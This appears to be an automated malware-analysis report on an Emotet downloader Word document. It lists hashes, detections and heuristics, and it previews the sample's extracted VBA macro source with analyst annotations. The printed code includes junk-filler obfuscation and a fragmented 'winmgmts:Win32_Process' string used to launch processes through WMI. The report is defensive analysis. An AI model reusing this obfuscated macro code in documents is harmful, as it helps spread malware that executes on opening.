Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 04946ffcd40c0aae…

MALICIOUS

Office (OLE)

232.0 KB Created: 2019-02-22 14:42:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: a05e9d60a1e5c6da5bcfa20afa6aa335 SHA-1: 9134caca0337b64b338c036b21d584533f66fd5e SHA-256: 04946ffcd40c0aae97afa4abbbd72dad4bb24e5556cbf4a20e512beef3f12aab
222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

ClamAV identifies the file as malicious with the signature 'Doc.Downloader.Emotet-6865931-0', which strongly suggests the Emotet family. Static analysis revealed a VBA macro with an AutoOpen function that calls GetObject, a technique commonly used to obtain an object outside the document and execute code through it; in the extracted source the object moniker is assembled from split string fragments ("winm" + "gmts:Win32" + … + "_Process"), which is consistent with an attempt to defeat simple string matching. Together, the macro and the ClamAV signature indicate downloader functionality, most likely used to fetch and execute a secondary payload. The single embedded URL (an Office schema namespace) is benign and is recorded only for completeness.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6865931-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6865931-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The macro project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
  • GetObject call high OLE_VBA_GETOBJ
    The macro source calls GetObject, which binds to an object by moniker and can reach objects outside the document itself.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 56843 bytes
SHA-256: 4e9a74e0eefcb7e7198c519bb9687b15a3f6b1f3225c766ab5853b160cc1b0db
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "r3_85__5"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note (not part of the sample): the attributes above describe the document
' module (VB_Base "1Normal.ThisDocument", VB_PredeclaredId True); no procedures follow
' them in this extraction. The second VB_Name attribute below starts a separate module,
' so macros.bas appears to be several modules concatenated by olevba.

Attribute VB_Name = "j1727_"
' Analyst note (not part of the sample): parameterless function from module "j1727_".
' Every statement sits inside a Select Case whose selector is an undeclared variable
' (no Option Explicit is visible, so it would be an uninitialised Variant) compared
' against a fixed integer literal; the case bodies therefore appear to be unreachable
' filler that bloats and varies the module rather than doing work. Nothing in the
' visible extraction calls this function, but the preview is truncated, so a caller
' may exist further down.
Function I_2_93()
   ' First of eight structurally identical Select Case blocks; the remaining seven
   ' differ only in the identifiers and numeric literals used.
   Select Case b_11____
         Case 73203527
' The body runs only if the never-assigned selector equals the literal. If it were
' reached, CBool of an empty Variant gives False and the division by it would raise
' a runtime error — this function has no On Error handler.
Set M_9_3144 = P_921_32
F_57999_ = (I27_768 * Fix(178987642 / CBool(I2_34_))) - s_0_34_5 / Oct(606445891) / 157413744 + CStr(W54_047) - 785343733 + ChrB(R_70013)
Set m3922_ = K13_6_1_
End Select
   Select Case n90732
         Case 831074526
Set J30_658_ = W219_2
f8__0_14 = (j46283_ * Fix(190017848 / CBool(B_8___7))) - B0552463 / Oct(316905375) / 482778063 + CStr(I312__58) - 843425485 + ChrB(Q7__1_3_)
Set b2_6_5 = B7039_
End Select
   Select Case A393__50
         Case 704924015
Set m9___2_9 = r619868
n_26379 = (O9_6_0_9 * Fix(128310735 / CBool(R_6623_9))) - i_433_ / Oct(603402391) / 191416489 + CStr(G_250_6) - 442532342 + ChrB(v4203_8_)
Set i_060_84 = P66196_1
End Select
   Select Case U_17176
         Case 601813333
Set r8_61153 = b5__277
I345_63 = (z_1_25_ * Fix(41561826 / CBool(N72377_))) - C69__2__ / Oct(552151791) / 221392231 + CStr(r8_316) - 702649844 + ChrB(I1_25_1_)
Set G55736_3 = c4__56_
End Select
   Select Case z90_7_78
         Case 492277147
Set m__866 = O95_3___
c0121290 = (F_0725_ * Fix(494110686 / CBool(q39725))) - Z_7_40_7 / Oct(136307424) / 658405674 + CStr(u_6286__) - 775575686 + ChrB(Z411619_)
Set v31_391 = K49_42_
End Select
   Select Case B__4171_
         Case 652176060
Set T_950_5 = t_47_680
s1_96__2 = (u5158_7_ * Fix(634069949 / CBool(k06_10))) - h_52_79 / Oct(440967238) / 166360103 + CStr(n____8_) - 877453112 + ChrB(w01_9368)
Set N88_193 = w859447_
End Select
   Select Case H_1_2_10
         Case 168197645
Set Q_0358_4 = Z455_03
C_1__8 = (k_2_50_ * Fix(234008729 / CBool(X05__73))) - j053__1_ / Oct(90888690) / 282396017 + CStr(i2_28_03) - 578601022 + ChrB(I204_3)
Set l3_7_68 = P____0
End Select
   Select Case H_5_7023
         Case 469318133
Set w8__90 = I2_7_64
S97____9 = (i1_9_2_ * Fix(649225998 / CBool(D27__6_3))) - W426__4 / Oct(110003264) / 122895531 + CStr(O0286372) - 381621500 + ChrB(D_943816)
Set J735_9_1 = b8__6567
End Select
' No assignment to the function name occurs, so the function's return value is an
' empty Variant if it is ever called.
End Function
Function O5_501_9(m1_8324_, B_035_)
On Error Resume Next
   Select Case Y_235709
         Case 380850347
Set k3_0330 = L056_91_
w04381 = (D_277_97 * Fix(877217687 / CBool(h46568))) - k306_65 / Oct(773960519) / 935570374 + CStr(Y9769_) - 800372286 + ChrB(Z_80__)
Set c6_9_819 = U12201_
End Select
   Select Case m1_4_49
         Case 421748949
Set v_4__34 = C993_48
E9_292 = (Q26717 * Fix(853485144 / CBool(M_1___17))) - G_213975 / Oct(823484808) / 650816908 + CStr(J48_3_) - 867296670 + ChrB(n8_199)
Set r_9049 = D3_821
End Select
   Select Case T_27_317
         Case 613883373
Set I25706 = i874__
Y8812672 = (S_1___6_ * Fix(178789198 / CBool(n_772_))) - i58869_2 / Oct(766988965) / 999219310 + CStr(I__104_) - 804099342 + ChrB(z_88_928)
Set E4_7_70 = s9_643__
End Select
f_452_ = A85_5___ + "winm" + "gmts:Win32" + A4138_ + "_ProcessStartup" + M390104
   Select Case H__7_68
         Case 980539786
Set j013_6_ = E35_1_3
I708420 = (B587_491 * Fix(303405247 / CBool(O2_064))) - z_887__6 / Oct(858164566) / 171357939 + CStr(b17__297) - 92230158 + ChrB(f__610_2)
Set u__8_19 = n__5849_
End Select
   Select Case b39774_
         Case 169910316
Set U6_9319 = f_1__639
X7_59_0 = (m_1611 * Fix(679626045 / CBool(M06765))) - Y702509 / Oct(833851975) / 644076260 + CStr(D4_7460) - 922866463 + ChrB(B049_59)
Set B0_24412 = W9624_
End Select
   Select Case c33381
         Case 778150247
Set N__9_55_ = s903_1__
z_9_536_ = (Z371_298 * Fix(936633686 / CBool(o5268_))) - G8343_ / Oct(474585312) / 165407149 + CStr(j_94_5) - 681157296 + ChrB(W_77_1_)
Set Z9_5676 = w425__4
End Select
j0364298 = F106__ + "winm" + "gmts:Win32" + Y8751_0_ + "_Process" + F04454
   Select Case r_719_0
         Case 369166872
Set h51_9_ = A6953_2_
k2_1
... (truncated)